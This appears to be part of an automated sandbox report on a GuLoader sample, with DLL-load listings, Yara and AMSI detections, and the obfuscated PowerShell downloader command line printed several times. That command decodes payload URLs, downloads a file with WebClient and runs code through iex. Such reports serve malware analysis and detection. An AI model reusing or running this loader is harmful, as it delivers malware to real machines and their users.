Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Byggeforetagender Jenda Non", "", "", "0");

Yara detected GuLoader

Source: Yara match	File source: 00000004.00000002.2307801127.000000000A152000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2959075340.0000000005192000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tetricalness)$global:Retterstedets = [System.Text.Encoding]::ASCII.GetString($Fusobacteria)$global:Makuleret=$Retterstedets.substring($Morderskers,$Horehuset)<#dissheathe Feuillage E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Protogelatose $Kernevaabnene $nonfusibility), (Fjernendes5 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Baandtlleres = [AppDomain]::CurrentDomain.GetAss
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Kasseapparatet)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Naboejendommene, $false).DefineType($Cambr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tetricalness)$global:Retterstedets = [System.Text.Encoding]::ASCII.GetString($Fusobacteria)$global:Makuleret=$Retterstedets.substring($Morderskers,$Horehuset)<#dissheathe Feuillage E

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e 